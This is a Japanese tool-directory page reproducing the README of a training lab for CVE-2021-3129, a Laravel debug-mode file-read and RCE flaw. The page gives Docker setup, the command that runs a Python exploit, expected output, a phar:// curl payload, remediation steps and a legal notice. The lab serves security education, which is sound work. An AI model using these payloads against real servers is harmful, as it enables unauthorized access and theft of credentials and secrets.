Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel Debug Mode RCE - Pythonエクスプロイト、Dockerコンテナ、およびセキュリティ分析ガイドを備えた完全な攻撃テストラボ。 | Kitploit
ツール/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE - Pythonエクスプロイト、Dockerコンテナ、およびセキュリティ分析ガイドを備えた完全な攻撃テストラボ。

リポジトリを見る
1112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-3129: Laravel デバッグモード RCE ラボ

License: MIT Python 3.8+ Docker CVSS: 7.5

CVE-2021-3129 を悪用するためのハンズオンラボ - 未認証でのファイル読み取りと潜在的な RCE を可能にする重大な Laravel 脆弱性です。

クイックスタート

# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

CVE-2021-3129 とは?

プロパティ詳細
深刻度CVSS 7.5 (High)
影響を受けるバージョンLaravel < 8.4.2, < 7.30.4
影響任意ファイル読み取り、情報漏えい、潜在的な RCE
認証要件なし
攻撃ベクトルネットワーク

仕組み

  1. 偵察 (Reconnaissance) - デバッグモードが有効な Laravel を特定する
  2. 検証 (Validation) - /_ide_helper.php エンドポイントをテストする
  3. 悪用 (Exploitation) - phar:// ラッパーを使用してファイルを読み取る
  4. 影響 (Impact) - 資格情報、API キー、環境変数を抽出する

前提条件

  • Docker Desktop
  • Python 3.8+
  • 4GB RAM

セットアップ (ステップバイステップ)

# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

期待される出力

[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

エクスプロイトの使用方法

# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

手動テスト

# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

修復方法

# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

クリーンアップ

# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

FAQ

Q: インターネット上でテストできますか?
A: いいえ。これはローカルホスト専用です。自分が所有していないシステムでテストしないでください。

Q: パッチ適用済みバージョンでも動作しますか?
A: いいえ。Laravel 8.4.2+ および 7.30.4+ はパッチが適用されています。

Q: エクスプロイトを変更できますか?
A: はい。コードは学習用に完全にコメントされています。

Q: ネットワークトラフィックをキャプチャするには?
A: tcpdump または Wireshark を使用します:

sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

法的注意事項

⚠️ 教育目的のみ

✅ 許可される用途:

  • 教育目的の学習
  • 許可を得たセキュリティテスト
  • 防御的な研究

❌ 禁止される用途:

  • 不正なシステムアクセス
  • 違法なハッキング
  • システムへの損害

所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。

リソース

  • CVE-2021-3129
  • Laravel Security
  • PHP Wrappers

作者

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Location: Bengaluru, Karnataka, India

ライセンス

MIT ライセンス - LICENSE ファイルを参照してください

ツールをダウンロード